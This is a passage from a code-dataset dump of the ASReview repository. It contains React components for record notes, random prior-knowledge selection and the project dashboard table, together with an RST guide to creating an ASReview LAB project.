initial: false,\n is_prior: !props.is_prior ? 0 : 1,\n });\n } else {\n props.setNote({\n data: null,\n editing: null,\n });\n }\n };\n\n const handleChangeNote = (event) => {\n props.setNote((s) => {\n return {\n ...s,\n data: event.target.value,\n };\n });\n };\n\n const disableEditNoteButton = () => {\n return (\n props.note?.editing !== null && props.note?.editing !== props.record?.id\n );\n };\n\n return (\n <Root>\n <Collapse\n in={\n props.record?.note !== null ||\n props.record?.id === props.note?.editing\n }\n timeout=\"auto\"\n unmountOnExit\n >\n <CardContent sx={{ padding: \"16px 16px 24px 24px\" }}>\n <Stack direction=\"row\" spacing={!props.mobileScreen ? 
3 : 2}>\n <Avatar\n alt=\"user\"\n src={ElasAvatar}\n sx={{\n width: !props.mobileScreen ? 56 : 40,\n height: !props.mobileScreen ? 56 : 40,\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\" ? \"grey.600\" : \"grey.400\",\n }}\n imgProps={{ sx: { p: 1 } }}\n />\n {props.note?.editing === props.record?.id && (\n <Stack\n direction=\"row\"\n spacing={!props.mobileScreen ? 2 : 1}\n sx={{ alignItems: \"baseline\", width: \"100%\" }}\n >\n <FormControl sx={{ width: \"100%\" }} variant=\"outlined\">\n <OutlinedInput\n autoComplete=\"off\"\n disabled={props.isLoading}\n multiline\n placeholder=\"Write something...\"\n value={!props.note?.data ? \"\" : props.note?.data}\n onChange={handleChangeNote}\n inputProps={{\n sx: {\n lineHeight: (theme) =>\n theme.typography.body1.lineHeight,\n },\n }}\n sx={{ p: 2 }}\n />\n </FormControl>\n <Button\n disabled={props.isLoading}\n onClick={() => handleClickSaveNote(props.record?.note)}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n >\n Save\n </Button>\n </Stack>\n )}\n {props.record?.note && props.note?.editing !== props.record?.id && (\n <Stack\n direction=\"row\"\n spacing={!props.mobileScreen ? 2 : 1}\n sx={{ alignItems: \"baseline\", width: \"100%\" }}\n >\n <Card\n elevation={0}\n sx={{\n borderRadius: 4,\n width: \"100%\",\n bgcolor: (theme) =>\n theme.palette.mode === \"dark\"\n ? \"background.paper\"\n : \"grey.100\",\n }}\n >\n <CardContent sx={{ pb: \"16px !important\" }}>\n <Typography sx={{ color: \"text.secondary\" }}>\n {props.record?.note}\n </Typography>\n </CardContent>\n </Card>\n <Tooltip\n title={\n !disableEditNoteButton()\n ? \"\"\n : \"Save another note before editing\"\n }\n >\n <span>\n <Button\n disabled={disableEditNoteButton()}\n onClick={() =>\n handleClickEditNote(\n props.record?.note,\n props.record?.id,\n )\n }\n size={!props.mobileScreen ? 
\"medium\" : \"small\"}\n >\n Edit\n </Button>\n </span>\n </Tooltip>\n </Stack>\n )}\n </Stack>\n </CardContent>\n </Collapse>\n </Root>\n );\n};\n\nexport default RecordCardNote;\n" }, { "alpha_fraction": 0.495353639125824, "alphanum_fraction": 0.506066083908081, "avg_line_length": 28.915058135986328, "blob_id": "c60dc446efd8d2a752ecc8870d707adcf479810f", "content_id": "10b2f29ae6e8b7d2970ef87b3b2e36fca91b00ae", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7748, "license_type": "permissive", "max_line_length": 91, "num_lines": 259, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/PriorRandom.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery, useQueryClient } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport {\n Box,\n CircularProgress,\n Divider,\n Fade,\n FormControl,\n MenuItem,\n Select,\n Stack,\n Tooltip,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { ArrowBack } from \"@mui/icons-material\";\n\nimport { InfoCard } from \"../../SetupComponents\";\nimport { InlineErrorHandler } from \"../../../Components\";\nimport { EnoughPriorBanner, PriorUnlabeled } from \"../DataComponents\";\nimport { StyledIconButton } from \"../../../StyledComponents/StyledButton\";\nimport { ProjectAPI } from \"../../../api/index.js\";\nimport { mapStateToProps, projectModes } from \"../../../globals.js\";\nimport { useToggle } from \"../../../hooks/useToggle\";\n\nconst PREFIX = \"PriorRandom\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n recordCard: `${PREFIX}-record-card`,\n infoCard: `${PREFIX}-info-card`,\n empty: `${PREFIX}-empty`,\n loading: `${PREFIX}-loading`,\n select: `${PREFIX}-select`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n height: \"100%\",\n [`& .${classes.root}`]: {\n height: \"100%\",\n },\n\n [`& .${classes.recordCard}`]: {\n alignItems: \"center\",\n height: \"calc(100vh - 208px)\",\n width: \"100%\",\n overflowY: \"scroll\",\n padding: \"32px 24px\",\n [theme.breakpoints.down(\"md\")]: {\n height: \"calc(100% - 56px)\",\n },\n },\n\n [`& .${classes.infoCard}`]: {\n width: \"100%\",\n maxWidth: \"400px\",\n },\n\n [`& .${classes.empty}`]: {\n height: \"calc(100% - 56px)\",\n display: \"flex\",\n alignItems: \"center\",\n justifyContent: \"center\",\n },\n\n [`& .${classes.loading}`]: {\n height: \"calc(100% - 56px)\",\n display: \"flex\",\n alignItems: \"center\",\n justifyContent: \"center\",\n },\n\n [`& .${classes.select}`]: {\n alignItems: \"center\",\n marginLeft: 8,\n width: \"100%\",\n },\n}));\n\nconst PriorRandom = (props) => {\n const queryClient = useQueryClient();\n const [reminder, toggleReminder] = useToggle();\n const [refresh, setRefresh] = React.useState(true);\n const [nRecords, setNRecords] = React.useState(5);\n const [subset, setSubset] = React.useState(\"relevant\");\n\n const { data, error, isError, isFetched, isFetching, isSuccess } = useQuery(\n [\n \"fetchPriorRandom\",\n {\n project_id: props.project_id,\n n: nRecords,\n subset: props.mode !== projectModes.ORACLE ? 
subset : null,\n },\n ],\n ProjectAPI.fetchPriorRandom,\n {\n enabled: refresh,\n onSuccess: () => {\n setRefresh(false);\n },\n refetchOnWindowFocus: false,\n },\n );\n\n const handleNRecordsChange = (event) => {\n setNRecords(event.target.value);\n setRefresh(true);\n };\n\n const handleSubsetChange = (event) => {\n setSubset(event.target.value);\n setRefresh(true);\n };\n\n const refetchPriorRandom = () => {\n queryClient.resetQueries(\"fetchPriorRandom\");\n };\n\n const onClickPriorSearch = () => {\n props.toggleSearch();\n props.toggleRandom();\n };\n\n React.useEffect(() => {\n if (\n props.mode === projectModes.ORACLE &&\n props.n_prior_exclusions !== 0 &&\n props.n_prior_exclusions % 5 === 0\n ) {\n toggleReminder();\n }\n }, [props.mode, props.n_prior_exclusions, toggleReminder]);\n\n React.useEffect(() => {\n if (\n data?.result.length &&\n !data?.result.filter((record) => record?.included === null).length\n ) {\n setRefresh(true);\n }\n }, [data?.result]);\n\n return (\n <Root>\n <Fade in>\n <Box className={classes.root}>\n <Stack direction=\"row\" sx={{ p: \"4px 16px\" }}>\n <Tooltip title=\"Select another way\">\n <StyledIconButton onClick={props.toggleRandom}>\n <ArrowBack />\n </StyledIconButton>\n </Tooltip>\n <Stack className={classes.select} direction=\"row\" spacing={1}>\n <Typography sx={{ color: \"text.secondary\" }}>Show</Typography>\n <FormControl variant=\"standard\" sx={{ width: \"48px\" }}>\n <Select value={nRecords} onChange={handleNRecordsChange}>\n <MenuItem value={1}>1</MenuItem>\n <MenuItem value={2}>2</MenuItem>\n <MenuItem value={3}>3</MenuItem>\n <MenuItem value={4}>4</MenuItem>\n <MenuItem value={5}>5</MenuItem>\n <MenuItem value={6}>6</MenuItem>\n <MenuItem value={7}>7</MenuItem>\n <MenuItem value={8}>8</MenuItem>\n <MenuItem value={9}>9</MenuItem>\n <MenuItem value={10}>10</MenuItem>\n </Select>\n </FormControl>\n <Typography sx={{ color: \"text.secondary\" }}>\n {props.mode === projectModes.ORACLE\n ? 
\"random records\"\n : \"random\"}\n </Typography>\n {props.mode !== projectModes.ORACLE && (\n <Stack\n direction=\"row\"\n spacing={1}\n sx={{ alignItems: \"center\" }}\n >\n <FormControl variant=\"standard\" sx={{ width: \"96px\" }}>\n <Select value={subset} onChange={handleSubsetChange}>\n <MenuItem value=\"relevant\">relevant</MenuItem>\n <MenuItem value=\"irrelevant\">irrelevant</MenuItem>\n </Select>\n </FormControl>\n <Typography sx={{ color: \"text.secondary\" }}>\n records\n </Typography>\n </Stack>\n )}\n </Stack>\n </Stack>\n <Divider />\n {isFetching && !isError && (\n <Box className={classes.loading}>\n <CircularProgress />\n </Box>\n )}\n {!isFetching && isError && (\n <Box className={classes.empty}>\n <InlineErrorHandler\n message={error[\"message\"]}\n refetch={refetchPriorRandom}\n button={true}\n />\n </Box>\n )}\n <EnoughPriorBanner\n n_prior_exclusions={props.n_prior_exclusions}\n onClickPriorSearch={onClickPriorSearch}\n reminder={reminder}\n toggleReminder={toggleReminder}\n />\n {!reminder &&\n !isError &&\n isFetched &&\n isSuccess &&\n data?.result.length !== 0 && (\n <Stack\n className={classes.recordCard}\n aria-label=\"unlabeled record card\"\n spacing={3}\n >\n <Box className={classes.infoCard}>\n <InfoCard info=\"Label records that you want to use as prior knowledge\" />\n </Box>\n {data?.result\n .filter((record) => record?.included === null)\n .map((record, index) => (\n <PriorUnlabeled\n record={record}\n mode={props.mode}\n nRecords={nRecords}\n subset={subset}\n key={`result-page-${index}`}\n />\n ))}\n </Stack>\n )}\n {!reminder &&\n !isError &&\n isFetched &&\n isSuccess &&\n data?.result.length === 0 && (\n <Box className={classes.empty}>\n <Typography variant=\"body2\" sx={{ color: \"text.secondary\" }}>\n No unlabeled records found\n </Typography>\n </Box>\n )}\n </Box>\n </Fade>\n </Root>\n );\n};\n\nexport default connect(mapStateToProps)(PriorRandom);\n" }, { "alpha_fraction": 0.7526237964630127, "alphanum_fraction": 0.7574438452720642, "avg_line_length": 38.578460693359375, "blob_id": "34aa799207f0b765a61aa380c37b8d4db6d7d2bf", "content_id": "5bcc2c834fb5d2cc5565db588bca25442de75116", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 12864, "license_type": "permissive", "max_line_length": 159, "num_lines": 325, "path": "/docs/source/project_create.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "****************\nCreate a project\n****************\n\nTo start reviewing a dataset with ASReview LAB, you first need to create a\nproject. The project will contain your dataset, settings, labeling decisions,\nand machine learning models. You can choose from three different project\ntypes: Oracle, Exploration, and Simulation. The project setup consists of\n4 steps: Project information, Data, Model, and Warm up. The sections below\nexplain each of the steps of the setup.\n\nTo create a project:\n\n1. :doc:`start`.\n2. Go to the *Projects dashboard* if you are not already there (http://localhost:5000/projects)\n3. Click on the *Create* button on the bottom left\n\nProject information\n===================\n\nIn Step 1, you provide all relevant information about your project as\nwell as the type of project you want (the mode). The sections below provide\nmore information on the input fields. After you complete this step, click\n*next*.\n\nProject modes\n-------------\n\nIn this step, you have to select a mode. The default is **Oracle**. 
Oracle mode\nis used to screen an unlabeled dataset with the help of AI (it's fine if you\nalready have labels, these will be used as prior knowledge). The other\ntwo modes, Simulation and Exploration, require fully labeled datasets. They\nare useful for teaching purposes or studying the performance of active\nlearning in a simulation study.\n\nIn short:\n\n- You have unlabeled or :ref:`data_labeled:Partially labeled data` -> Oracle\n- You have :ref:`data_labeled:Fully labeled data` -> Simulation or Exploration.\n\n.. figure:: ../images/setup_project_modes.png\n   :alt: Project modes\n\n\nProject details\n---------------\n\nProvide project details like the name of the project (required), author(s) (for\nexample, the name of the screener), and a description. You can edit these\nvalues later in the *Details* page.\n\n\nData\n====\n\nIn Step 2, you import a dataset and select prior knowledge.\n\nAdd Dataset\n-----------\n\nClick on *Add* to select a dataset. The data needs to adhere to a\n:doc:`specific format <data>`.\n\nDepending on the :ref:`Project mode <project_create:Project modes>`, you are\noffered the following options for adding a dataset. Keep in mind that in Oracle\nmode, your dataset is unlabeled or :ref:`data_labeled:Partially labeled data`. For Exploration and Simulation mode, you need :ref:`data_labeled:Fully labeled\ndata`.\n\n.. tip::\n\n    You will benefit most from what active learning has to offer with :ref:`data:High-quality data`.\n\n\nFrom File\n~~~~~~~~~\n\nDrag and drop your file or select your file. Click on *Save* on the top right.\n\nFrom URL or DOI\n~~~~~~~~~~~~~~~\n\nInsert a URL to a dataset. For example, use a URL from this\n`dataset repository <https://github.com/asreview/systematic-review-datasets>`__.\nIt is also possible to provide a DOI to a data repository (supported for many\ndata repositories via `Datahugger <https://github.com/J535D165/datahugger>`__).\nIf a DOI points to multiple files, select the file you want to use (e.g.\n`10.17605/OSF.IO/WDZH5 <https://doi.org/10.17605/OSF.IO/WDZH5>`__).\n\nClick on *Add* to add the dataset.\n\nFrom Extension\n~~~~~~~~~~~~~~\n\nOracle and Exploration only. Select a file available via an extension. Click\non *Save* on the top right.\n\nBenchmark Datasets\n~~~~~~~~~~~~~~~~~~\n\nFor Simulation and Exploration only. Select one of the\n:ref:`data_labeled:benchmark datasets`. Click\non *Save* on the top right.\n\n.. note::\n    After adding your dataset, ASReview LAB shows the approximate number of duplicates.\n    This number is based on duplicate titles and abstracts and if available, on the Digital Object Identifier (`DOI <https://www.doi.org/>`_).\n    Removing duplicates can be done via `ASReview Datatools <https://github.com/asreview/asreview-datatools>`_,\n    which also allows using a persistent identifier (PID) other than DOI for\n    identifying and removing duplicates.\n\n
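As an aside, the benchmark datasets offered above can also be inspected\nprogrammatically. A minimal, illustrative sketch using the ``DatasetManager``\nclass from ``asreview.datasets`` (the identifier below is one of the benchmark\nIDs used in the ASReview test suite; any other benchmark ID works the same\nway):\n\n.. code:: python\n\n    from asreview.datasets import DatasetManager\n\n    # look up a benchmark dataset by its identifier\n    dataset = DatasetManager().find(\"benchmark:van_de_Schoot_2017\")\n\n    # each dataset exposes a title and the URL of the raw data file\n    print(dataset.title)\n    print(dataset.filepath)\n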
\nSelect Prior Knowledge\n----------------------\n\n.. note::\n    If you use :ref:`data_labeled:Partially labeled data` you can skip this step. \n\nThe first iteration of the active learning cycle requires training data,\nreferred to as prior knowledge. This knowledge is used by the classifier to\ncreate an initial ranking of the unseen records. In this step, you need to\nprovide a minimum training data set of size two, with **at least** one\nrelevant and one irrelevant labeled record.\n\nTo facilitate prior selection, it is possible to search within your dataset.\nThis is especially useful for finding records that are relevant based on\nprevious studies or expert consensus. \n\nYou can also let ASReview LAB present you with random documents. This can be\nuseful for finding irrelevant records.\n\nThe interface works as follows: on the left, you will see methods to find\nrecords to use as prior knowledge; on the right, you will see your selected\nprior knowledge. If you have **at least** one relevant and one irrelevant\nrecord, you can click *Close* and go to the next step. \n\n.. figure:: ../images/setup_prior.png\n   :alt: ASReview prior knowledge selector\n\n\nSearch\n~~~~~~\n\nLet's start with finding a prior relevant document. The most efficient way\nto do this is by searching for a specific document that you already know is\nrelevant. Click on Search and search your dataset by authors,\nkeywords or title, or a combination thereof. Make sure to be precise\nwith the search terms, as only the first 10 results are shown to you.\nAfter entering your search terms, press enter to start searching.\n\n\n.. figure:: ../images/setup_prior_search_empty.png\n   :alt: ASReview prior knowledge search\n\n\nClick the document you had in mind and answer the question \"Is this record relevant?\".\nNote: don't label all items here, only the one you are looking for and want to\nuse as training data.\n\nThe prior knowledge will now show up on the right. There are no restrictions\non the number of records and the software already works with 2 labels (1\nrelevant and 1 irrelevant). \n\nIf you are done searching prior knowledge, click *Close*.\n\n.. figure:: ../images/setup_prior_search_1rel.png\n   :alt: ASReview prior knowledge search 1 relevant\n\nRandom\n~~~~~~\n\n.. warning::\n    Do not use the random option to search for the sparse relevant records!\n\n\nYou also need to provide at least one prior irrelevant document. One way to\nfind an irrelevant document is by labeling a set of random records from the\ndataset. Given that the majority of records in the dataset are irrelevant\n(extremely imbalanced data problem), the records presented here are likely to\nbe irrelevant for your study. Click on *random* to show a few random records.\nIndicate for each record you want to use as training data whether it is\nirrelevant (or relevant).\n\n.. figure:: ../images/setup_prior_random_1rel.png\n   :alt: ASReview prior knowledge random\n\nThe prior knowledge will now show up on the right. Use the buttons to see all\nprior knowledge or irrelevant items. There are no restrictions on the number\nof records you provide, and the software already works with 2 labeled\nrecords (1 relevant and 1 irrelevant). \n\nAfter labeling five randomly selected records, ASReview LAB will ask you\nwhether you want to stop searching prior knowledge. Click on *STOP* and\nclick *Next*.\n\nIf you are done, click *Close*.\n\nModel\n=====\n\nIn the next step of the setup, you can select the active learning model. The\ndefault settings (Naïve Bayes, TF-IDF, Max) have fast and excellent\nperformance. Most users can skip this step and click *Next*. 
More information\nabout the active learning process can be found in the blog post `Active learning explained <https://asreview.nl/blog/active-learning-explained/>`_.\n\nSelect model\n------------\n\nIt is possible to change the settings of the Active learning model. There are\nfour settings that can be changed in the software: \n\n\nFeature extraction\n~~~~~~~~~~~~~~~~~~\n\nThe feature extraction technique determines how text is translated\ninto a vector that can be used by the classifier. The default is TF-IDF (Term\nFrequency-Inverse Document Frequency) from `SKLearn <https://scikit-learn.org/stable/modules/generated/sklearn.feature_extraction.text.TfidfVectorizer.html>`_.\nIt works well in combination with Naive Bayes and other fast training models.\n\nAnother recommended option is Doc2Vec provided by the `gensim <https://radimrehurek.com/gensim/>`_\npackage. Before starting ASReview LAB, first install *gensim*:\n\n.. code:: bash\n\n    pip install gensim\n\n.. note::\n\n    It takes relatively long to create a feature matrix with Doc2Vec, but this\n    only has to be done once. The upside of this method is that it takes context\n    into account. Another benefit is the dimensionality reduction that generally\n    takes place, which makes the modeling quicker.\n\nSeveral other feature extractors are available in the software (sentence Bert,\nembedding IDF/LSTM) and more feature extractors can be selected via the :doc:`API\n<reference>`, or added via an :ref:`extensions_dev:model extensions`. \n\nClassifier\n~~~~~~~~~~\n\nThe classifier is the machine learning model used to compute the relevance\nscores. The default is Naive Bayes. Though relatively simplistic, it seems to\nwork quite well on a wide range of datasets. Several other classifiers are\navailable in the software (logistic regression, random forest, SVM, LSTM,\nneural net) and more classifiers can be selected via the :doc:`API\n<reference>` or added via an :ref:`extensions_dev:model extensions`. \n\nThe neural nets require `tensorflow <https://www.tensorflow.org/>`_. To install it, use\n\n.. code:: bash\n\n    pip install tensorflow\n\n\nBalancing Strategy\n~~~~~~~~~~~~~~~~~~\n\nTo decrease the class imbalance in the training data, the default is to\nrebalance the training set by a technique called dynamic resampling (DR)\n(`Ferdinands et al., 2020 <https://doi.org/10.31219/osf.io/w6qbg>`_). DR\nundersamples the number of irrelevant records in the training data, whereas\nthe relevant records are oversampled such that the size of the\ntraining data remains the same. The ratio between relevant and irrelevant\nrecords in the rebalanced training data is not fixed, but dynamically updated\nand depends on the number of records in the available training data, the total\nnumber of records in the dataset, and the ratio between relevant and\nirrelevant records in the available training data. The other options are no\nbalancing and undersampling. Other strategies can be selected via the\n:doc:`API <reference>` or added via an :ref:`extensions_dev:model extensions`.\n\n\nQuery Strategy\n~~~~~~~~~~~~~~\n\nThe query strategy determines which document is shown after the model has\ncomputed the relevance scores. The options are: maximum (certainty-based),\nmixed, uncertainty, random, and clustering. When certainty-based is selected, the\ndocuments are shown in the order of relevance score. The document most likely\nto be relevant is shown first. When mixed is selected, the next document will\nbe selected certainty-based 95% of the time, and uncertainty-based or randomly\nchosen otherwise. When random is selected, documents are shown in a random\norder (ignoring the model output completely). Other strategies can be selected\nvia the :doc:`API <reference>` or added via an :ref:`extensions_dev:model\nextensions`.\n\n
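Each of these query strategies corresponds to a class in the ASReview Python\nAPI, reachable through small helper functions (defined in\n``asreview/models/query/utils.py``). A minimal, illustrative sketch; treat the\nimport path as version-dependent rather than a stable public API:\n\n.. code:: python\n\n    from asreview.models.query.utils import get_query_model, list_query_strategies\n\n    # list the available query strategy classes\n    print(list_query_strategies())\n\n    # instantiate the default certainty-based strategy by name\n    query_model = get_query_model(\"max\")\n\n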
.. warning::\n    Selecting *random* means your review will not be accelerated by using ASReview.\n\nModel switching \n~~~~~~~~~~~~~~~\n\nDuring the screening phase, it is not possible to change the model. However,\nit is possible to select a first model, screen part of the data, and export\nthe dataset with the labeling decisions of the first model. This\npartly-labeled dataset can be imported into a new project and the labels based\non the first model will be recognized as prior knowledge. Then, a second model\ncan be trained on the partly-labeled data, and the new predictions will be\nbased on the second model.\n\n.. tip::\n\n    It is suggested to screen with a simple active learning model (e.g.,\n    the defaults) first until you reach your stopping criteria, then switch to a\n    different model (e.g., doc2vec plus a neural net) and screen again until\n    you reach your stopping criteria.\n\nWarm up\n=======\n\nIn the last step of the setup, step 4, ASReview LAB runs the feature extractor,\ntrains a model, and ranks the records in your dataset. Depending on the\nmodel and the size of your dataset, this can take a couple of minutes (or even\nlonger; you can enjoy the `animation video <https://www.youtube.com/watch?v=k-a2SCq-LtA>`_). After the project is successfully\ninitialized, you can start reviewing.\n\n.. note::\n\n    In Simulation mode, this step starts the simulation. As simulations usually\n    take longer to complete, the simulation will run in the background. After a\n    couple of seconds, you will see a message and a button \"Got it\". You will\n    navigate to the :ref:`progress:Analytics` page, where you can follow the\n    progress (see *Refresh* button on the top right).\n\n.. 
figure:: ../images/setup_warmup.png\n :alt: ASReview LAB warmup\n" }, { "alpha_fraction": 0.4757286012172699, "alphanum_fraction": 0.48027363419532776, "avg_line_length": 31.533536911010742, "blob_id": "7559eef49fba6da660f66e88cf4f34bce0bdef73", "content_id": "facb83ef7ef7ef0b845530e6e19b6f0305d0453e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 21342, "license_type": "permissive", "max_line_length": 83, "num_lines": 656, "path": "/asreview/webapp/src/HomeComponents/DashboardComponents/ProjectTable.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useMutation, useQuery, useQueries, useQueryClient } from \"react-query\";\nimport { connect, useSelector, useDispatch } from \"react-redux\";\nimport { useNavigate } from \"react-router-dom\";\nimport {\n Box,\n Button,\n Chip,\n CircularProgress,\n Paper,\n Table,\n TableBody,\n TableCell,\n TableContainer,\n TableHead,\n TablePagination,\n TableRow,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { BoxErrorHandler, DialogErrorHandler } from \"../../Components\";\nimport { ProjectDeleteDialog } from \"../../ProjectComponents\";\nimport { ProjectCheckDialog, TableRowButton } from \"../DashboardComponents\";\nimport { ProjectAPI } from \"../../api/index.js\";\nimport { useRowsPerPage } from \"../../hooks/SettingsHooks\";\nimport { useToggle } from \"../../hooks/useToggle\";\nimport ElasArrowRightAhead from \"../../images/ElasArrowRightAhead.svg\";\nimport {\n checkIfSimulationFinishedDuration,\n mapDispatchToProps,\n projectModes,\n projectStatuses,\n formatDate,\n} from \"../../globals\";\nimport useAuth from \"../../hooks/useAuth\";\nimport { setMyProjects } from \"../../redux/actions\";\n\nconst PREFIX = \"ProjectTable\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n error: `${PREFIX}-error`,\n table: `${PREFIX}-table`,\n tableCell: `${PREFIX}-tableCell`,\n converting: `${PREFIX}-converting`,\n img: `${PREFIX}-img`,\n title: `${PREFIX}-title`,\n titleWrapper: `${PREFIX}-title-wrapper`,\n loadingProjects: `${PREFIX}-loading-projects`,\n};\n\nconst StyledPaper = styled(Paper)(({ theme }) => ({\n [`&.${classes.root}`]: {\n width: \"100%\",\n borderRadius: 16,\n marginBottom: 64,\n },\n\n [`& .${classes.error}`]: {\n display: \"flex\",\n justifyContent: \"center\",\n paddingTop: 64,\n paddingBottom: 132,\n },\n\n [`& .${classes.table}`]: {\n minWidth: 700,\n },\n\n [`& .${classes.tableCell}`]: {\n letterSpacing: \"0.25px\",\n },\n\n [`& .${classes.converting}`]: {\n display: \"flex\",\n alignItems: \"center\",\n },\n\n [`& .${classes.img}`]: {\n maxWidth: 140,\n marginTop: 8,\n marginBottom: 64,\n marginLeft: 100,\n },\n\n [`& .${classes.title}`]: {\n cursor: \"pointer\",\n display: \"-webkit-box\",\n letterSpacing: \"0.25px\",\n WebkitBoxOrient: \"vertical\",\n WebkitLineClamp: 1,\n whiteSpace: \"pre-line\",\n overflow: \"hidden\",\n },\n\n [`& .${classes.titleWrapper}`]: {\n display: \"flex\",\n alignItems: \"center\",\n width: \"100%\",\n },\n\n [`& .${classes.loadingProjects}`]: {\n display: \"flex\",\n justifyContent: \"center\",\n paddingTop: 64,\n paddingBottom: 248,\n },\n}));\n\nconst columns = [\n { id: \"name\", label: \"Project\", width: \"55%\" },\n { id: \"created_at_unix\", label: \"Date\", width: \"15%\" },\n { id: \"mode\", label: \"Mode\", width: \"15%\" },\n { id: \"status\", label: \"Status\", width: \"15%\" },\n];\n\nconst 
ProjectTable = (props) => {\n const navigate = useNavigate();\n const queryClient = useQueryClient();\n const authenticated = useSelector((state) => state.authentication);\n const myProjects = useSelector((state) => state.myProjects);\n const dispatch = useDispatch();\n const { auth } = useAuth();\n\n /**\n * Project table state\n */\n const [page, setPage] = React.useState(0);\n const [hoverRowId, setHoverRowId] = React.useState(null);\n const [hoverRowIdPersistent, setHoverRowIdPersistent] = React.useState(null);\n const [hoverRowTitle, setHoverRowTitle] = React.useState(null);\n const [hoverIsOwner, setHoverIsOwner] = React.useState(false);\n const [rowsPerPage, handleRowsPerPage] = useRowsPerPage();\n\n /**\n * Dialog state\n */\n const [onDeleteDialog, toggleDeleteDialog] = useToggle();\n\n /**\n * Simulation status query state\n */\n const [querySimulationFinished, setQuerySimulationFinished] = React.useState(\n [],\n );\n const [querySimulationError, setQuerySimulationError] = React.useState({\n isError: false,\n message: null,\n });\n\n /**\n * Fetch projects and check if simulation running in the background\n */\n const { error, isError, isFetched, isFetching, isSuccess } = useQuery(\n \"fetchProjects\",\n ProjectAPI.fetchProjects,\n {\n onError: () => {\n setQuerySimulationFinished([]);\n },\n onSuccess: (data) => {\n // set in redux store\n dispatch(setMyProjects(data.result));\n // reset query for fetching simulation project(s) status\n setQuerySimulationFinished([]);\n // get simulation project(s) running in the background\n const simulationProjects = data.result.filter(\n (element) =>\n element.mode === projectModes.SIMULATION &&\n element.reviews[0] !== undefined &&\n element.reviews[0].status === projectStatuses.REVIEW,\n );\n if (!simulationProjects.length) {\n console.log(\"No simulation running\");\n } else {\n const simulationQueries = [];\n const project_id = simulationProjects.map((element) => element.id);\n // prepare query array for fetching simulation project(s) status\n for (let key in project_id) {\n // reset query if error\n if (querySimulationError.isError) {\n queryClient.resetQueries(`fetchProjectStatus-${project_id[key]}`);\n setQuerySimulationError({\n isError: false,\n message: null,\n });\n }\n // update query array\n simulationQueries.push({\n queryKey: [\n `fetchProjectStatus-${project_id[key]}`,\n { project_id: project_id[key] },\n ],\n queryFn: ProjectAPI.fetchProjectStatus,\n enabled: project_id[key] !== null,\n onError: (error) => {\n setQuerySimulationError({\n isError: true,\n message: error.message,\n });\n },\n onSuccess: (data) => {\n if (data[\"status\"] === projectStatuses.FINISHED) {\n // simulation finished\n queryClient.invalidateQueries(\"fetchDashboardStats\");\n // update cached data\n queryClient.setQueryData(\"fetchProjects\", (prev) => {\n return {\n ...prev,\n result: prev.result.map((project) => {\n return {\n ...project,\n reviews: project.reviews.map((review) => {\n return {\n ...review,\n status:\n project.id === project_id[key]\n ? 
projectStatuses.FINISHED\n : review.status,\n };\n }),\n };\n }),\n };\n });\n } else {\n // not finished yet\n setTimeout(\n () =>\n queryClient.invalidateQueries(\n `fetchProjectStatus-${project_id[key]}`,\n ),\n checkIfSimulationFinishedDuration,\n );\n }\n },\n refetchOnWindowFocus: false,\n });\n }\n // pass prepared query array\n setQuerySimulationFinished(simulationQueries);\n }\n },\n refetchOnWindowFocus: false,\n },\n );\n\n /**\n * Fetch if simulation project(s) finished\n */\n useQueries(querySimulationFinished);\n\n const { mutate: mutateStatus } = useMutation(ProjectAPI.mutateProjectStatus, {\n onError: (error) => {\n props.setFeedbackBar({\n open: true,\n message: error.message,\n });\n },\n onSuccess: (data, variables) => {\n queryClient.invalidateQueries(\"fetchDashboardStats\");\n // update cached data\n queryClient.setQueryData(\"fetchProjects\", (prev) => {\n return {\n ...prev,\n result: prev.result.map((project) => {\n return {\n ...project,\n reviews: project.reviews.map((review) => {\n return {\n ...review,\n status:\n project.id === variables.project_id\n ? variables.status\n : review.status,\n };\n }),\n };\n }),\n };\n });\n },\n });\n\n const handleChangeStatus = (project) => {\n mutateStatus({\n project_id: project[\"id\"],\n status:\n project.reviews[0].status === projectStatuses.REVIEW\n ? projectStatuses.FINISHED\n : projectStatuses.REVIEW,\n });\n };\n\n const clearSetupError = (project) => {\n mutateStatus({\n project_id: project[\"id\"],\n status: projectStatuses.SETUP,\n });\n };\n\n const openProject = (project, path) => {\n if (\n project[\"reviews\"][0] === undefined ||\n project[\"reviews\"][0][\"status\"] === projectStatuses.SETUP ||\n project[\"reviews\"][0][\"status\"] === projectStatuses.ERROR\n ) {\n // set project id\n props.setProjectId(project[\"id\"]);\n // open project setup dialog\n props.toggleProjectSetup();\n // clear potential setup error\n if (\n project[\"reviews\"][0] !== undefined &&\n project[\"reviews\"][0][\"status\"] === projectStatuses.ERROR\n ) {\n clearSetupError(project);\n }\n } else if (!project[\"projectNeedsUpgrade\"]) {\n // open project page\n navigate(`/projects/${project[\"id\"]}/${path}`);\n } else {\n // open project check dialog\n props.setProjectCheck({\n open: true,\n issue: \"upgrade\",\n path: path,\n project_id: project[\"id\"],\n });\n }\n };\n\n /**\n * Show buttons when hovering over project title\n */\n const hoverOnProject = (project_id, project_title, owner_id) => {\n setHoverRowId(project_id);\n setHoverRowIdPersistent(project_id);\n setHoverRowTitle(project_title);\n setHoverIsOwner(authenticated && owner_id !== auth.id ? 
